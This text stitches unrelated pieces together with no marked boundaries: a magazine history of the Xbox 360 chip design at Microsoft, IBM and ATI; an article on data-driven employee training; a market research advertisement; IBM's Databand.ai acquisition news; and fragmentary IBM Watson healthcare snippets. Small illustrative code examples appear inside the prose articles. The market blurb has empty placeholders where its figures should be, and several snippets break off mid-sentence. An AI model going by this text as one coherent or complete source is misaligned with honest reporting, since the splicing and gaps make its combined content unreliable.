Learning from failure is a hallmark of the technology business. Nick Baker, a 37-year-old system architect at Microsoft, knows that well. A British transplant at the software giant's Silicon Valley campus, he went from failed project to failed project in his career. He worked on such dogs as Apple Computer's defunct video card business, 3DO's failed game consoles, a chip startup that screwed up a deal with Nintendo, the never-successful WebTV and Microsoft's canceled Ultimate TV satellite TV recorder.
But Baker finally has a hot seller with the Xbox 360, Microsoft's video game console launched worldwide last holiday season. The adventure on which he embarked four years ago would ultimately prove that failure is often the best teacher. His new gig would once again provide copious evidence that flexibility and understanding of detailed customer needs will beat a rigid business model every time. And so far the score is Xbox 360, one, and the delayed PlayStation 3, nothing.
The Xbox 360 console is Microsoft's living room Trojan horse, purchased as a game box but capable of so much more in the realm of digital entertainment in the living room. Since the day after Microsoft terminated the Ultimate TV box in February 2002, Baker has been working on the Xbox 360 silicon architecture team at Microsoft's campus in Mountain View, CA. He is one of the 3DO survivors who now gets a shot at revenge against the Japanese companies that vanquished his old firm.
"It feels good," says Baker. "I can play it at home with the kids. It's family-friendly, and I don't have to play on the Nintendo anymore."
Baker is one of the people behind the scenes who pulled together the Xbox 360 console by engineering some of the most complicated chips ever designed for a consumer entertainment device. The team labored for years and made critical decisions that enabled Microsoft to beat Sony and Nintendo to market with a new box, despite a late start with the Xbox in the previous product cycle. Their story, captured here and in a forthcoming book by the author of this article, illustrates the ups and downs in any big project.
When Baker and his pal Jeff Andrews joined games programmer Mike Abrash in early 2002, they had clear marching orders. Their bosses — Microsoft CEO Steve Ballmer; Robbie Bach, who ran the Xbox division; Xbox hardware chief Todd Holmdahl; Greg Gibson, who headed Xbox 360 system architecture; and silicon chief Larry Yang — all dictated what Microsoft needed this time around.
They couldn't be late. They had to make hardware that could become much cheaper over time and they had to pack as much performance into a game console as they could without overheating the box.
The group of silicon engineers started first among the 2,000 people in the Xbox division on a project that Baker had code-named Trinity. But they couldn't use that name, because someone else at Microsoft had taken it. So they named it Xenon, for the colorless and odorless gas, because it sounded cool enough. Their first order of business was to study computing architectures, from those of the best supercomputers to those of the most power-efficient portable gadgets. Although Microsoft had chosen Intel and NVIDIA to make the chips for the original Xbox, the engineers now talked to a broad spectrum of semiconductor makers.
"For us, 2002 was about understanding what the technology could do," says Greg Gibson, system designer.
Sony teamed up with IBM and Toshiba to create a full-custom microprocessor from the ground up. They planned to spend $400 million developing the Cell architecture and even more fabricating the chips. Microsoft didn't have the time or the chip engineers to match the effort on that scale, but Todd Holmdahl and Larry Yang saw a chance to beat Sony. They could marshal a host of virtual resources and create a semicustom design that combined both off-the-shelf technology and their own ideas for game hardware. Microsoft would lead the integration of the hardware, own the intellectual property, set the cost-reduction schedules, and manage its vendors closely.
They believed this approach would get them to market by 2005, which was when they estimated Sony would be ready with the PlayStation 3. (As it turned out, Microsoft's dreams were answered when Sony, in March, postponed the PlayStation 3 launch until November.)
More important, owning the chip IP could dramatically cut the costs that had dogged the original Xbox. Microsoft had lost an estimated $3.7 billion over four years, or a whopping $168 per box. By cutting costs, Microsoft could erase a lot of red ink.
Baker and Andrews quickly decided they wanted to create a balanced design, trading off power efficiency and performance. So they envisioned a multicore microprocessor, one with as many as 16 cores — or miniprocessors — on one chip. They wanted a graphics chip with 60 shaders, or parallel processors for rendering distinct features in graphic animations.
Laura Fryer, manager of the Xbox Advanced Technology Group in Redmond, WA, solicited feedback on the new microprocessor. She said game developers were wary of managing multiple software threads associated with multiple cores, because the switch created a juggling task they didn't have to do on the original Xbox or the PC. But they appreciated the power efficiency and added performance they could get.
Microsoft's current vendors, Intel and NVIDIA, didn't like the idea that Microsoft would own the IP they created. For Intel, allowing Microsoft to take the x86 design to another manufacturer was as troubling as signing away the rights to Windows would be to Microsoft. NVIDIA was willing to do the work, but if it had to deviate from its road map for PC graphics chips in order to tailor a chip for a game box, then it wanted to get paid for it. Microsoft didn't want to pay that high a price. "It wasn't a good deal," says Jen-Hsun Huang, CEO of NVIDIA. Microsoft had also been through a painful arbitration on pricing for the original Xbox graphics chips.
IBM, on the other hand, had started a chip engineering services business and was perfectly willing to customize a PowerPC design for Microsoft, says Jim Comfort, an IBM vice president. At first IBM didn't believe that Microsoft wanted to work together, given a history of rancor dating back to the DOS and OS/2 operating systems in the 1980s. Moreover, IBM was working for Microsoft rivals Sony and Nintendo. But Microsoft pressed IBM for its views on multicore chips and discovered that Big Blue was ahead of Intel in thinking about these kinds of designs.
When Bill Adamec, a Microsoft program manager, traveled to IBM's chip design campus in Rochester, MN, he did a double take when he arrived at the meeting room where 26 engineers were waiting for him. Although IBM had reservations about Microsoft's schedule, the company was clearly serious.
Meanwhile, ATI Technologies assigned a small team to conceive a proposal for a game console graphics chip. Instead of pulling out a derivative of a PC graphics chip, ATI's engineers decided to design a brand-new console graphics chip that relied on embedded memory to feed a lot of data to the graphics chip while keeping the main data pathway clear of traffic — critical for avoiding bottlenecks that would slow down the system.
By the fall of 2002, Microsoft's chip architects decided they favored the IBM and ATI solutions. They met with Ballmer and Gates, who wanted to be involved in the critical design decisions at an early juncture. Larry Yang recalls, "We asked them if they could stomach a relationship with IBM." Their affirmative answer pleased the team.
By early 2003, the list of potential chip suppliers had been narrowed down. At that point, Robbie Bach, the chief Xbox officer, took his team to a retreat at the Salish Lodge, on the edge of Washington's beautiful Snoqualmie Falls, made famous by the "Twin Peaks" television show. The team hashed out a battle plan. They would own the IP for silicon that could take the costs of the box down quickly. They would launch the box in 2005 at the same time as Sony would launch its box, or even earlier. The last time, Sony had had a 20-month head start with the PlayStation 2. By the time Microsoft sold its first 1.4 million Xboxes, Sony had sold more than 25 million PlayStation 2s.
Those goals fit well with the choice of IBM and ATI for the two pieces of silicon that would account for more than half the cost of the box. Each chip provider moved forward, based on a "statement of work," but Gibson kept his options open, and it would be months before the team finalized a contract. Both IBM and ATI could pull blocks of IP from their existing products and reuse them in the Microsoft chips. Engineering teams from both companies began working on joint projects such as the data pathway that connected the chips. ATI had to make contingency plans, in case Microsoft chose Intel over IBM, and IBM also had to consider the possibility that Microsoft might choose NVIDIA.
Through the summer, Microsoft executives and marketers created detailed plans for the console launch. They decided to build security into the microprocessor to prevent hacking, which had proved to be a major embarrassment on the original Xbox. Marketers such as David Reid all but demanded that Microsoft try to develop the new machine in a way that would allow the games for the original Xbox to run on it. So-called backward compatibility wasn't necessarily exploited by customers, but it was a big factor in deciding which box to buy. And Bach insisted that Microsoft had to make gains in Japan and Europe by launching in those regions at the same time as in North America.
For a period in July 2003, Bob Feldstein, the ATI vice president in charge of the Xenon graphics chip, thought NVIDIA had won the deal, but in August Microsoft signed a deal with ATI and announced it to the world. The ATI chip would have 48 shaders, or processors that would handle the nuances of color shading and surface features on graphics objects, and would come with 10 Mbytes of embedded memory.
IBM followed with a contract signing a month later. The deal was more complicated than ATI's, because Microsoft had negotiated the right to take the IBM design and have it manufactured in an IBM-licensed foundry being built by contract chip maker Chartered Semiconductor. The chip would have three cores and run at 3.2 GHz. It was a little short of the 3.5 GHz that IBM had originally pitched, but it wasn't off by much.
By October 2003, the entire Xenon team had made its pitch to Gates and Ballmer. They faced some tough questions. Gates wanted to know if there was any chance the box would run the complete Windows operating system. The top executives ended up giving the green light to Xenon without a Windows version.
The ranks of Microsoft's hardware team swelled to more than 200, with half of the team members working on silicon integration. Many of these people were like Baker and Andrews, stragglers who had come from failed projects such as 3DO and WebTV. About 10 engineers worked on "Ana," a Microsoft video encoder chip, while others managed the schedule and cost reduction with IBM and ATI. Others supported suppliers, such as Silicon Integrated Systems, the provider of the "south bridge," the communications and input/output chip. The rest of the team helped handle relationships with vendors for the other 1,700 parts in the game console.
Ilan Spillinger headed the IBM chip program, which carried the code name Waternoose, after the spiderlike creature from the film "Monsters, Inc." He supervised IBM's chief engineer, Dave Shippy, and worked closely with Microsoft's Andrews on every aspect of the design program.
Everything happened in parallel. For much of 2003, a team of industrial designers created the look and feel of the box. They tested the design on gamers, and the feedback suggested that the design seemed like something either Apple or Sony had created. The marketing team decided to call the machine the Xbox 360, because it put the gamer at the center. A small software team led by Tracy Sharp developed the operating system in Redmond. Microsoft started investing heavily in games. By February 2004, Microsoft sent out the first kits to game developers for making games on Apple Macintosh G5 computers. And in early 2004, Greg Gibson's evaluation team began testing subsystems to make sure they would all work together when the final design came together.
IBM assigned 421 engineers from six or seven sites to the project, which was a proving ground for its design services business. The effort paid off, with an early test chip that came out in August 2004. With that chip, Microsoft was able to begin debugging the operating system. ATI taped out its first design in September 2004, and IBM taped out its full chip in October 2004. Both chips ran game code early on, which was good, considering that it's very hard to get chips working at all when they first come out of the factory.
IBM executed without many setbacks. As it revised the chip, it fixed bugs with two revisions of the chip's layers. The company was able to debug the design in the factory quickly, because IBM's fab engineers could work on one part of the chip while the Chartered engineers debugged a different part. They fed the information to each other, speeding the cycle of revisions. By Jan. 30, 2005, IBM taped out the final version of the microprocessor.
ATI, meanwhile, had a more difficult time. The company had assigned 180 engineers to the project. Although games ran on the chip early, problems came up in the lab. Feldstein said that in one game, one frame of animation would freeze as every other frame went by. It took six weeks to uncover the bug and find a fix. Delays in debugging threatened to throw the beta-development-kit program off schedule. That meant thousands of game developers might not get the systems they needed on time. If that happened, the Xbox 360 might launch without enough games, a disaster in the making.
The pressure was intense. But Neil McCarthy, a Microsoft engineer in Mountain View, designed a modification of the metal layers of the graphics chip. By doing so, he enabled Microsoft to get working chips from the interim design. ATI's foundry, Taiwan Semiconductor Manufacturing Co., churned out enough chips to seed the developer systems. The beta kits went out in the spring of 2005.
Meanwhile, Microsoft's brass was thinking that Sony would trump the Xbox 360 by coming out with more memory in the PlayStation 3. So in the spring of 2005, Microsoft made what would become a fateful decision. It decided to double the amount of memory in the box, from 256 Mbytes to 512 Mbytes of graphics Double Data Rate 3 (GDDR3) chips. The decision would cost Microsoft $900 million over five years, so the company had to pare back spending in other areas to stay on its profit targets.
Microsoft started tying up all the loose ends. It rehired Seagate Technology, which it had hired for the original Xbox, to make hard disk drives for the box, but this time Microsoft decided to have two SKUs — one with a hard drive, for the enthusiasts, and one without, for the budget-conscious. It brought aboard both Flextronics and Wistron, the current makers of the Xbox, as contract manufacturers. But it also laid plans to have Celestica build a third factory for building the Xbox 360.
Just as everyone started to worry about the schedule going off course, ATI spun out the final graphics chip design in mid-July 2005. Everyone breathed a sigh of relief, and they moved on to the tough work of ramping up manufacturing. There was enough time for both ATI and IBM to build a stockpile of chips for the launch, which was set for Nov. 22 in North America, Dec. 2 in Europe and Dec. 10 in Japan.
Flextronics debugged the assembly process first. Nick Baker traveled to China to debug the initial boxes as they came off the line. Although assembly was scheduled to start in August, it didn't get started until September. Because the machines were being built in southern China, they had to be shipped over a period of six weeks by boat to the regions. Each factory could build only as many as 120,000 machines a week, running at full tilt. The slow start, combined with the multiregion launch, created big risks for Microsoft.
The hardware team was on pins and needles. The most complicated chips came in on time and were remarkable achievements. Typically, the initial design of chip projects this complex takes more than two years, but both companies were actually manufacturing inside that time window.
Then something unexpected hit. Both Samsung and Infineon Technologies had committed to making the GDDR3 memory for Microsoft. But some of Infineon's chips fell short of the 700 MHz specified by Microsoft. Using such chips could have slowed games down noticeably. Microsoft's engineers decided to start sorting the chips, not using the subpar ones. Because GDDR3 700 MHz chips were just ramping up, there was no way to get more chips. Each system used eight chips. The shortage constrained the supply of Xbox 360s.
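The sorting the engineers resorted to is the industry's standard practice of speed-binning: test each part, keep only those that meet the spec, and reject the rest. A minimal sketch of that logic (the part IDs and measured frequencies below are invented for illustration):

```python
# Speed-binning sketch: keep only memory parts that meet the 700 MHz spec.
# Part IDs and measured frequencies are invented for illustration.
SPEC_MHZ = 700

tested_parts = [
    ("lot1-001", 712.0),
    ("lot1-002", 688.5),  # subpar: rejected
    ("lot1-003", 700.0),
    ("lot1-004", 695.2),  # subpar: rejected
]

usable = [part_id for part_id, mhz in tested_parts if mhz >= SPEC_MHZ]
print(usable)  # only the parts at or above spec survive
```

With every console needing eight in-spec chips, any batch with a high reject rate directly throttled how many Xbox 360s could be built.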
Microsoft blamed the resulting shortfall of Xbox 360s on a variety of component shortages. Some users complained of overheating systems. But overall, the company said, the launch was still a great achievement. In its first holiday season, Microsoft sold 1.5 million Xbox 360s, compared to 1.4 million original Xboxes in the holiday season of 2001. But the shortage continued past the holidays.
Leslie Leland, hardware evaluation director, says she felt "terrible" about the shortage and that Microsoft would strive to get a box into the hands of every consumer who wanted one. But Greg Gibson, system designer, says that Microsoft could have worse problems on its hands than a shortage. The IBM and ATI teams had outdone themselves.
The project was by far the most successful Nick Baker had ever worked on. One night, hoisting a beer and looking at a finished console, he said it felt good.
J Allard, the head of the Xbox platform business, praised the chip engineers such as Baker: "They were on the highest wire with the shortest net."
This story first appeared in the May issue of Electronic Business magazine.
It’s not a robot. It’s the employee of the future. (Illustration: Andrés Moncayo)
In 2009, Pep Boys, the nationwide auto parts and service chain, realized that its traditional ways of educating employees about theft—through posters, classes, and meetings—weren't really working. It turned to a Canadian startup called Axonify to try a different approach, in which the information was stripped down to the most critical concepts and presented more like a mobile game: quick sessions that employees could complete on their phones in just three minutes a day. Using the system was voluntary, with the incentive of earning points that could be redeemed for rewards.
The program didn’t take long to prove its worth. Unlike many corporate learning systems, this one actually got used, and the use generated measurable business results: Pep Boys saw losses due to theft at its more than 700 stores drop by $20 million in the first year alone, because employees were better able to identify suspicious behavior and report it properly. Before the experiment, “they took for granted that employees knew what to do,” says Axonify CEO Carol Leaman, but it turned out that employees needed to actually learn theft-prevention tactics, not just be exposed to them.
The human resources industry is in the midst of a huge shift in how it thinks about employee training and learning. “A lot of other areas of business have already been transformed through technology, but HR, as is often the case, hasn’t had the same level of investment until rather recently,” says Jon Ingham, a UK-based consultant in human capital management. The HR software market is now estimated at $15 billion, but not all of that money is being put to good use. According to analyst Josh Bersin, despite the fact that learning management systems are the fastest growing segment (currently worth about $2.5 billion), up to 30 percent of the corporate training material that companies develop is wasted.
The very idea that training should be measured by what employees actually learn is a conceptual breakthrough in and of itself. In the 1990s, traditional classroom training began to give way to “learning management systems,” which helped companies better scale their training efforts, because instruction could be centralized and distributed on demand via the corporate intranet. But the data and reports they generated were primitive. “At that time, it was very much about who attended the courses,” says Jonathan Ferrar, vice president of IBM’s Smarter Workforce, “but that’s of almost no value. What companies really want to know is whether employees actually learn and retain the information, and whether it’s the right information for improving business performance.”
Advances in big data analysis and machine learning now allow IBM to isolate variables and discover which are responsible for significant learning insights. “Five years ago, that type of analysis would take statisticians and data scientists days or weeks,” says Ferrar, “but now it can be done in minutes or hours.” He notes that when companies have an accurate assessment of employee knowledge, they can actually save money. “Rather than wasting employee time by making everyone sit through an hour-long compliance training each year, for example, companies should first find out who actually needs the training, and who already knows the regulatory standards.”
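Ferrar's "assess first, train only who needs it" point reduces to a simple filter once assessment scores exist. A hedged sketch of the idea (the names, scores, and 80-point passing threshold are all hypothetical, not IBM's actual criteria):

```python
# Sketch: assign the annual compliance course only to employees whose
# assessment score falls below a passing threshold. All data is invented.
PASS_SCORE = 80

assessment_scores = {
    "alice": 92,
    "bob": 74,   # below threshold: needs the course
    "carol": 85,
    "dave": 61,  # below threshold: needs the course
}

needs_training = sorted(
    name for name, score in assessment_scores.items() if score < PASS_SCORE
)
print(needs_training)

# Assuming a one-hour course, everyone who tested out saves that hour.
hours_saved = len(assessment_scores) - len(needs_training)
print(f"{hours_saved} employee-hours of training avoided")
```

Scaled from four employees to a workforce of thousands, that filter is where the cost savings Ferrar describes come from.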
In Axonify’s platform, assessment and training are directly tied together. Because many employees use Axonify regularly, the platform is able to constantly track employee knowledge and intelligently provide the information needed to close an employee’s individual knowledge gap, says Leaman. The app also leverages learning research to optimize retention by repeating the questions in specific time intervals. Even after an employee “graduates” out of a specific topic, the questions will still be revisited about seven months later to help lock in the knowledge.
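The spacing behavior Leaman describes can be sketched as an expanding-interval schedule: each consecutive correct answer pushes the next review further out, and a graduated topic resurfaces months later. The interval values below are placeholders modeled on the description above, not Axonify's actual algorithm:

```python
from datetime import date, timedelta

# Expanding-interval sketch of spaced repetition. The interval ladder and
# the ~7-month revisit (210 days) are illustrative placeholders.
INTERVALS_DAYS = [1, 3, 7, 14, 30]   # reviews while a topic is still active
GRADUATED_REVISIT_DAYS = 210         # roughly seven months after graduating

def next_review(last_seen: date, correct_streak: int) -> date:
    """Return the date a question should reappear for this employee."""
    if correct_streak >= len(INTERVALS_DAYS):  # topic "graduated"
        return last_seen + timedelta(days=GRADUATED_REVISIT_DAYS)
    return last_seen + timedelta(days=INTERVALS_DAYS[correct_streak])

today = date(2015, 1, 1)
print(next_review(today, 0))  # new or missed question: see it again tomorrow
print(next_review(today, 5))  # graduated topic: revisited about 7 months out
```

The key design choice is that the schedule is driven per question and per employee by answer history, which is why constant, lightweight usage gives the platform an up-to-date picture of each person's knowledge.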
IBM uses behavior data a bit differently, to deliver useful training materials to employees when they actually need them. For example, when a new IBM employee schedules their first meeting with other employees, the system detects that it’s their first time and proactively presents material on how to conduct a meeting. “We’re closing the gap between new and experienced employees, and accelerating that transition,” says Kramer Reeves, IBM’s director of messaging and collaboration solutions.
Traditional Classroom Training
How did it work? Exactly how you’d expect it to work. In-person lectures gathered employees and trained them collectively in organized sessions.
What did it measure? Little more than attendance and, if there were tests and quizzes, individual performance scores.
Learning Management Systems
How did it work? It brought the classroom experience to the computer screen and removed the need for in-person lectures or sessions. Training could now be done individually at the employee’s convenience.
What did it measure? LMSs were largely limited to measuring completion of the training and, if there were tests and quizzes, individual performance scores.
The Big Data-Driven LMS
How does it work? With new tools in big data analysis and machine learning, you can identify what works and what doesn’t in your training materials in minutes, as opposed to days in the past.
What does it measure? Big data can definitively show how well your training works—making the process more efficient and cutting down on unnecessary training.
The Smart LMS
How does it work? Training has been unbundled, and different tools teaching different skills can be deployed à la carte when relevant challenges are encountered.
What does it measure? The Smart LMS can measure how often different skills in the position are needed and how necessary training is for the various skills.
The Social LMS
How does it work? The social web has broken down walls that once resulted in employees being trained in a vacuum. Instead of having a single system that teaches all employees the same things, new employees can learn from experienced ones.
What does it measure? By bringing together the training needs of new employees with the experience of more tenured ones, employers can better close the knowledge gap between them.
Why does all this matter?
U.S. organizations spent $171.5 billion on employee training and development in 2010 and $156.2 billion in 2012.
But to really get insight about what employees know and how they’re learning, analytics systems will need to take into account more than just HR-provided training material. “The things that happen in a learning management system are less than ten percent of the activities that real people pursue when they want to learn something,” says Tim Martin, a co-founder of Rustici Software. “If you want to learn something, you don’t go to an LMS, whether you have access to it or not—you usually go to Google or a co-worker.”
Martin is one of the creators of the Tin Can API, a new standard for communicating and storing information about employee learning events. Tin Can is the modern successor to SCORM, a specification that was originally created to standardize content across different learning management systems. The only things that SCORM could measure and track were events in which a single user was logged into a learning management system, taking a prescribed piece of training in an active browser session. Tin Can, on the other hand, allows companies and employees to record more common learning events: attending a session at a conference, say, or researching and writing a company blog post. “Companies are starting to recognize how employees actually learn and allowing them to do it the way they wish to, rather than forcing them into a draconian system,” Martin says.
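Concretely, a Tin Can (xAPI) record is a JSON statement built around an actor-verb-object triple, which is what lets it capture events like "attended a conference session" that never touch an LMS. A minimal sketch of one such statement (the name, email, and activity ID are invented; the verb URI follows the ADL verb registry):

```python
import json

# Minimal Tin Can (xAPI) statement: "Sam attended Learning Analytics 101."
# Actor and activity identifiers are invented for illustration; the
# actor/verb/object shape follows the xAPI specification.
statement = {
    "actor": {
        "name": "Sam Example",
        "mbox": "mailto:sam@example.com",
    },
    "verb": {
        "id": "http://adlnet.gov/expapi/verbs/attended",
        "display": {"en-US": "attended"},
    },
    "object": {
        "id": "http://example.com/sessions/learning-analytics-101",
        "definition": {"name": {"en-US": "Learning Analytics 101"}},
    },
}

# In practice, this JSON would be POSTed to a Learning Record Store (LRS),
# which collects statements from many tools, not just one LMS.
print(json.dumps(statement, indent=2))
```

Because any tool can emit statements in this shape, the record of learning follows the employee rather than living inside a single system.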
Reeves says that this type of outside integration is part of a larger trend in IT departments. More and more CEOs are demanding technology solutions that support external collaboration, according to IBM surveys. Across industries, companies are shifting from controlled, closed environments to more open environments. It’s no longer feasible to expect a single program or tool to do everything—instead, employees expect multiple applications to work well together in a useful way.
One example of useful linking is the way IBM has integrated social collaboration tools into their talent management and learning systems. Social interaction has long been missing from virtual classroom instruction, and after all, learning is “very much a social activity,” says Jacques Pavlenyi, IBM’s program manager for social collaboration software marketing. IBM has found that employees learn and retain more when they’re working socially.
As job-related learning becomes more user-friendly and comprehensive, it also empowers employees to improve their own performance. Leaman says that in surveys of why employees voluntarily use Axonify, she was surprised to see that the most common reason wasn’t the rewards offered, but “because it helps me do my job better.” When people have knowledge, she says, they feel more empowered, more confident in taking action, and “are actually much better employees.”
Ten years ago, says Ingham, HR technology was mostly meant to be used by the HR department, whereas now companies are more focused on employees themselves as the primary users. In the future, Ingham would like companies to use technology not to control employees, but to enable and liberate them to increase their own performance. “The opportunity is not to use analytics to control but to provide employees meaningful data about the way they’re operating within an organization so that they themselves can do things to improve their working lives and their performance,” he says.
Global Data Science and Machine-Learning Platforms Market 2022-2028, By Product Type (Open Source Data Integration Tools, Cloud-based Data Integration Tools), By Application End User (Small-Sized Enterprises, Medium-Sized Enterprise, Large Enterprises), and Geography (Asia-Pacific, North America, Europe, South America, and the Middle East and Africa), Segments and Forecasts from 2022 to 2028. Global Data Science and Machine-Learning Platforms market size is estimated to be worth USD million in 2021 and is forecast to a readjusted size of USD million by 2028 with a CAGR of Percent
According to Eon Market Research’s recent Data Science and Machine-Learning Platforms Market analysis, the Data Science and Machine-Learning Platforms market is expected to grow significantly in the approaching years. Analysts looked at growth drivers, restraints, challenges, and opportunities in the global market. The Data Science and Machine-Learning Platforms report forecasts and forecasts the market’s expected direction in the following years. The writers of the report have done an excellent job of describing the essential business moves that huge firms employ to keep the market viable by analyzing the modest landscape. The purpose of this Data Science and Machine-Learning Platforms market report is to communicate information on global developments in the Data Science and Machine-Learning Platforms business, particularly as they relate to product production and commerce.
Get a Full PDF sample Copy of the Data Science and Machine-Learning Platforms Market Report: (Including Full TOC, List of Tables and Figures, and Chart) at https://www.eonmarketresearch.com/sample/94168
Data Science and Machine-Learning Platforms Market segment by players, this report covers
SAS, Alteryx, IBM, RapidMiner, KNIME, Microsoft, Dataiku, Databricks, TIBCO Software, MathWorks, H20ai, Anaconda, SAP, Google, Domino Data Lab, Angoss, Lexalytics, Rapid Insight
Product Type Outlook (Revenue, USD Billion; 2021– 2027)
Open Source Data Integration Tools, Cloud-based Data Integration Tools
Application/End-User (Revenue, USD Billion; 2021– 2027)
Small-Sized Enterprises, Medium-Sized Enterprise, Large Enterprises
Region Outlook (Revenue, USD Billion; 2021– 2027)
● North America- US, Canada, and Mexico
● Europe- Germany, UK, France, Italy, Spain, Benelux, and Rest of Europe
● Asia Pacific- China, India, Japan, South Korea, and Rest of Asia Pacific
● Latin America- Brazil and Rest of Latin America
● Middle East and Africa- Saudi Arabia, UAE, South Africa, Rest of Middle East and Africa
Have Any Query? Ask Our Experts: https://www.eonmarketresearch.com/enquiry/94168
The Global Data Science and Machine-Learning Platforms Market report gives an overview of present market information as well as forecasts for the long term. The Data Science and Machine-Learning Platforms market report provides a comprehensive analysis of the market, including revenue and quantity development patterns, recent growth drivers, analyst reports, statistics, and sector commercialization data. The marketplace and the Data Science and Machine-Learning Platforms industry are outlined by several in-depth, significant, and stimulating aspects, according to the research. The analysis covers market dynamics and growth, drivers, capacity, and the evolving financial pattern of the Data Science and Machine-Learning Platforms Market as a result of COVID-19 and its rehabilitation. The research also includes expenditure predictions for Data Science and Machine-Learning Platforms from 2022 to 2028.
The research report provides a complete overview of the key Data Science and Machine-Learning Platforms Market, including geographical and national global market research, CAGR projection of industry growth over the projected period, production, major drivers, competition landscape, and overall demand forecasts. In addition, the research discusses the significant obstacles and hazards that will be faced over the projected period. The Data Science and Machine-Learning Platforms_ Market is divided into two categories: type and application. Companies, players, and other decision-makers in the global Data Science and Machine-Learning Platforms Market will get an advantage by utilizing the study as a valuable resource.
Browse Complete Data Science and Machine-Learning Platforms Market Report Details with Table of contents and list of tables at https://www.eonmarketresearch.com/data-science-and-machine-learning-platforms-market-94168
Key takeaways of the global Data Science and Machine-Learning Platforms market:
● The report forecasts future production, pricing models, demand, and related statistics for Data Science and Machine-Learning Platforms. It also examines important emerging trends and their implications for current and future growth.
● The research distinguishes the market's segments and sub-segments to clarify its structure.
● Companies are profiled to characterize inventory levels, revenue, growth prospects, trends, opportunities and threats, and improvement initiatives over the next few years.
30 N Gould St Ste R, Sheridan, WY 82801, USA
Phone: +1 (310) 601-4227
Email: [email protected]
IBM has announced the acquisition of data observability software vendor Databand.ai. Today’s announcement marks IBM’s fifth acquisition of 2022. The company says the acquisition “further strengthens IBM’s software portfolio across data, AI, and automation to address the full spectrum of observability and helps businesses ensure that trustworthy data is being put into the right hands of the right users at the right time.”
Data observability is an expanding sector in the big data market, spurred by explosive growth in the amount of data organizations produce and manage. Data quality issues can arise at such volumes, and Gartner research shows that poor data quality costs businesses an average of $12.9 million a year.
“Data observability takes traditional data operations to the next level by using historical trends to compute statistics about data workloads and data pipelines directly at the source, determining if they are working, and pinpointing where any problems may exist,” said IBM in a press release. “When combined with a full stack observability strategy, it can help IT teams quickly surface and resolve issues from infrastructure and applications to data and machine learning systems.”
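The core idea described here, computing statistics about data workloads directly at the source and comparing them against historical trends, can be sketched in a few lines. The following is a minimal illustration, not Databand.ai's actual API; the function name and the three-sigma anomaly rule are assumptions made for the example:

```python
from statistics import mean, stdev

def check_batch(history, batch_rows):
    """Flag a pipeline batch whose row count deviates sharply from the
    historical trend (a simple z-score rule)."""
    mu, sigma = mean(history), stdev(history)
    if sigma == 0:
        return batch_rows != mu
    z = abs(batch_rows - mu) / sigma
    return z > 3  # anomalous if more than 3 standard deviations out

history = [1000, 1020, 990, 1010, 1005]  # row counts of past pipeline runs
print(check_batch(history, 1008))  # normal volume
print(check_batch(history, 120))   # likely an incomplete load
```

A real observability platform tracks many such metrics per dataset (null rates, schema changes, freshness) and alerts at the pipeline step where the deviation first appears.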
IBM says the acquisition will give Databand.ai more resources to expand its observability capabilities for broader integration across more open-source and commercial solutions. Enterprises will also retain flexibility in how they run Databand.ai, either with a subscription or as a service.
IBM has made over 25 strategic acquisitions since Arvind Krishna took the helm as CEO in April 2020. The company mentions that Databand.ai will be used with IBM Observability by Instana APM, another observability acquisition, and IBM Watson Studio, its data science platform, to address the full spectrum of observability across IT operations. To provide a more complete view of a data platform, Databand.ai can alert data teams and engineers when data they are working with is incomplete or missing, while Instana can explain which application the missing data originates from and why the application service is failing.
“Our clients are data-driven enterprises who rely on high-quality, trustworthy data to power their mission-critical processes. When they don’t have access to the data they need in any given moment, their business can grind to a halt,” said Daniel Hernandez, General Manager for Data and AI, IBM. “With the addition of Databand.ai, IBM offers the most comprehensive set of observability capabilities for IT across applications, data and machine learning, and is continuing to provide our clients and partners with the technology they need to deliver trustworthy data and AI at scale.”
Databand.ai is headquartered in Tel Aviv, and its employees will join IBM’s Data and AI division to grow its portfolio of data and AI products, including Watson and IBM Cloud Pak for Data.
“You can’t protect what you can’t see, and when the data platform is ineffective, everyone is impacted –including customers,” said Josh Benamram, co-founder and CEO of Databand.ai. “That’s why global brands such as FanDuel, Agoda and Trax Retail already rely on Databand.ai to remove bad data surprises by detecting and resolving them before they create costly business impacts. Joining IBM will help us scale our software and significantly accelerate our ability to meet the evolving needs of enterprise clients.”
This page shows the latest IBM Watson news and features for those working in and with pharma, biotech and healthcare.
A recent GlobalData report suggests that more than 100 companies are working on applying AI to healthcare, with big tech names such as Google, Microsoft, Amazon and IBM Watson paving the
old project with IBM Watson Health applying AI to real-world data to improve insight on the expected outcomes of breast cancer treatment.
Pfizer is using IBM’s Watson machine-learning platform to help find new immuno-oncology targets and drugs, for example, while Sanofi is using a rival system from UK firm Exscientia ... costs. That’s an approach already being explored by IBM’s
Building upon its existing work with IBM Watson Health and Glooko, Novo Nordisk aims to seamlessly integrate insulin-dosing data from connected pen devices with its partners' open ecosystems and diabetes
The report states that there are currently over 100 companies applying AI to healthcare, with big names such as Google, Microsoft, Amazon and IBM Watson paving the way.
The company is, he said, “all over this”, having already collaborated with the likes of Verily, the life sciences unit at Google parent company Alphabet, and IBM’s Watson and Deep ... I can see artificial intelligence in diagnosis. IBM Watson has a
Tushar Pant, Consulting Executive in Healthcare at IBM, discusses how technology is transforming healthcare. ... Among many other things, we explore how IBM is working to improve the healthcare industry in Canada, the technology behind IBM Watson, and
In what is perhaps an even more impressive display, operating within the diagnostic remit, IBM Watson, a question answering supercomputer combining AI and sophisticated analytical software, has been put to use ... Early experience with IBM Watson for
IBM Watson, the cognitive computer system from IBM, is already helping healthcare professionals to learn, diagnose and manage patient care better.
In 2011, IBM’s supercomputer WATSON competed against and obliterated a long-term game show champion. ... With its ability to use natural language capabilities, hypothesis generation, and evidence-based learning, IBM WATSON has made the switch to
The planned integration of Merge Healthcare’s capabilities with IBM’s Watson platform means we are now conceivably a step closer at seeing a computer determine a diagnosis from a scan ... data collection and analytic capabilities offered by IBM’s
Over the past decade, artificial intelligence (AI) has emerged as an engine of discovery by helping to unlock information from large repositories of previously inaccessible data. The cloud has expanded computer capacity exponentially by creating a global network of remote and distributed computing resources. And quantum computing has arrived on the scene as a game changer in processing power by harnessing quantum simulation to overcome the scaling and complexity limits of classical computing.
In parallel to these advances in computing, in which IBM is a world leader, the healthcare and life sciences have undergone their own information revolution. There has been an explosion in genomic, proteomic, metabolomic and a plethora of other foundational scientific data, as well as in diagnostic, treatment, outcome and other related clinical data. Paradoxically, however, this unprecedented increase in information volume has resulted in reduced accessibility and a diminished ability to use the knowledge embedded in that information. This reduction is caused by siloing of the data, limitations in existing computing capacity, and processing challenges associated with trying to model the inherent complexity of living systems.
